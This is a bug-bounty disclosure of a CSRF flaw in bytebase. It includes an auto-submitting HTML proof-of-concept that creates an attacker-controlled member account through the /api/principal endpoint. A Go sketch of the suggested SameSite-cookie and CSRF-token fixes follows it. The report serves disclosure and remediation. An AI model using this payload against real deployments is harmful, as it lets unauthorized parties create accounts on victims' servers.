Cross-Site Request Forgery (CSRF) in bytebase/bytebase
Reported on
Oct 13th 2021
Description
All parts of the application that use the POST HTTP method to change or create data are vulnerable to CSRF attacks (for example, the PATCH endpoints are not vulnerable).
I will show only the create-member PoC here; if you want PoCs for other endpoints, just tell me and I will provide them too (I thought more PoCs were not needed).
1. Open the PoC.html file.
2. After you open PoC.html, a request is sent to the http://YOURSERVER:5678/api/principal endpoint.
3. After that you can see that the attacker has created a Dev member named `attacker` with email `attacker@mail.com`, for which the attacker already holds the new user's credentials.
```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <!-- enctype="text/plain" lets the form body carry the JSON payload:
         the input name is the first half of the JSON, the value the rest. -->
    <form action="http://YOURSERVER:5678/api/principal" method="POST" enctype="text/plain">
      <input type="hidden" name="{&quot;data&quot;:{&quot;type&quot;:&quot;PrincipalCreate&quot;,&quot;attributes&quot;:{&quot;name&quot;:&quot;attacker&quot;,&quot;email&quot;:&quot;attacker@mail.com&quot;,&quot;password&quot;:&quot;VGS86VrDTMAOUYP0&quot;}}, &quot;test&quot;:&quot;" value="&quot;}" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
The impact of this CSRF is high.
# Fix suggestion
Set the SameSite attribute of all cookies to Strict or Lax, or, better, create a CSRF token for each request.
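As an added example (not bytebase's own code), here is a Go net/http sketch of both suggested fixes: the session cookie is issued with SameSite=Strict, and every state-changing request must carry a per-session CSRF token in a header, compared in constant time. It also rejects a non-JSON Content-Type, which is exactly the property the PoC's enctype="text/plain" form cannot satisfy. The cookie name, header name, in-memory token store, and the constructed requests in main are assumptions for illustration.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"errors"
	"fmt"
	"net/http"
	"strings"
	"sync"
)

// Assumed names for this example; bytebase's real cookie/header names may differ.
const (
	sessionCookieName = "session"
	csrfHeaderName    = "X-CSRF-Token"
)

var (
	ErrNoSession      = errors.New("csrf: missing or unknown session cookie")
	ErrBadContentType = errors.New("csrf: state-changing request must be application/json")
	ErrTokenMismatch  = errors.New("csrf: missing or invalid CSRF token")
)

// sessionStore is a hypothetical in-memory map: session ID -> synchronizer token.
type sessionStore struct {
	mu     sync.Mutex
	tokens map[string]string
}

func newSessionStore() *sessionStore { return &sessionStore{tokens: map[string]string{}} }

// issueToken binds a fresh random token to the session. The legitimate frontend
// receives it in a response body; a cross-site page that merely triggers a form
// submission can never read it.
func (s *sessionStore) issueToken(sessionID string) (string, error) {
	buf := make([]byte, 32)
	if _, err := rand.Read(buf); err != nil {
		return "", err
	}
	tok := hex.EncodeToString(buf)
	s.mu.Lock()
	s.tokens[sessionID] = tok
	s.mu.Unlock()
	return tok, nil
}

// SessionCookie sets SameSite=Strict (the report's first suggestion) plus
// HttpOnly and Secure, so the browser omits the cookie from the PoC's cross-site POST.
func SessionCookie(sessionID string) *http.Cookie {
	return &http.Cookie{
		Name: sessionCookieName, Value: sessionID, Path: "/",
		HttpOnly: true, Secure: true, SameSite: http.SameSiteStrictMode,
	}
}

func isSafeMethod(m string) bool {
	return m == http.MethodGet || m == http.MethodHead || m == http.MethodOptions
}

// CheckCSRF returns nil when a request may change state: safe methods pass;
// others need a JSON content type (a plain HTML form cannot send one) and a
// token header equal to the token bound to the session cookie.
func (s *sessionStore) CheckCSRF(r *http.Request) error {
	if isSafeMethod(r.Method) {
		return nil
	}
	if !strings.HasPrefix(strings.ToLower(r.Header.Get("Content-Type")), "application/json") {
		return ErrBadContentType
	}
	c, err := r.Cookie(sessionCookieName)
	if err != nil {
		return ErrNoSession
	}
	s.mu.Lock()
	expected, ok := s.tokens[c.Value]
	s.mu.Unlock()
	if !ok {
		return ErrNoSession
	}
	// Constant-time compare so the token cannot be guessed byte by byte.
	if subtle.ConstantTimeCompare([]byte(r.Header.Get(csrfHeaderName)), []byte(expected)) != 1 {
		return ErrTokenMismatch
	}
	return nil
}

// Protect wraps any handler (for instance the POST /api/principal handler) with the check.
func (s *sessionStore) Protect(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if err := s.CheckCSRF(r); err != nil {
			http.Error(w, err.Error(), http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	store := newSessionStore()
	tok, _ := store.issueToken("sess-1")
	// Constructed request shaped like the PoC: POST, text/plain, cookie present, no token.
	forged, _ := http.NewRequest(http.MethodPost, "/api/principal", strings.NewReader("{}"))
	forged.Header.Set("Content-Type", "text/plain")
	forged.AddCookie(SessionCookie("sess-1"))
	fmt.Println("forged:", store.CheckCSRF(forged))
	// Constructed request as the real frontend would send it.
	legit, _ := http.NewRequest(http.MethodPost, "/api/principal", strings.NewReader("{}"))
	legit.Header.Set("Content-Type", "application/json")
	legit.Header.Set(csrfHeaderName, tok)
	legit.AddCookie(SessionCookie("sess-1"))
	fmt.Println("legitimate:", store.CheckCSRF(legit))
}
```

Two points to keep in mind when applying this: the Secure attribute means the cookie is only sent over HTTPS, so a plain-http deployment like the http://YOURSERVER:5678 in the PoC needs TLS before that part takes effect, and SameSite=Lax would also stop this particular PoC, since Lax withholds the cookie from cross-site POST submissions while still sending it on top-level GET navigations.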
Hey bytebase team, can I ask you to tell me why you deleted the other occurrences?
There are many CSRFs in bytebase and I found all of them; if you make one fix for all of them, that doesn't mean there is only one occurrence (according to other bug bounty programs that I have seen). Please let me know, and if you agree I will report them again.